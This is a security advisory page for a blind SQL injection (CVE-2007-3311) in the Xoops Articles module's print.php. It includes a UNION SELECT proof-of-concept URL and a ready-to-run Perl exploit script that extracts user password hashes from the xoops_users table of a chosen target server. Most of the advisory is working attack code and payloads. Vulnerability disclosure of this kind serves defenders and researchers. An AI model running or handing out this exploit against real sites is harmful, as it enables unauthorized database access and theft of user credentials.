|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2817 CVE : CVE-2007-3311 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : UniquE Published : 26.06.2007
Advisory Text : Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC Type : SQL Injection Release Date : {2007-03-26} Product / Vendor : Xoops Portal http://www.Xoops.Org Bug : http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0 PoC : http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELE CT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1 /* Exploit : #!/usr/bin/perl -w ############################################# #Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]# ############################################# use IO::Socket; if (@ARGV != 3) { print "n-----------------------------------n"; print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploitn"; print "-----------------------------------n"; print "nUniquE-Key{UniquE-Cracker}n"; print "UniquE[at]UniquE-Key.ORGn"; print "http://UniquE-Key.ORGn"; print "n-----------------------------------n"; print "nUsage: $0 <server> <path> <uid>n"; print "Examp: $0 www.victim.com /path 1n"; print "n-----------------------------------n"; exit (); } $server = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL, NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0nHost: %snAccept: */*nConnection: closenn", $path,$server,$uid); while(<$socket>) { if (/>(w{32})</) { print "nID '$uid' User Password :nn$1n"; } } Tested : All Version Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |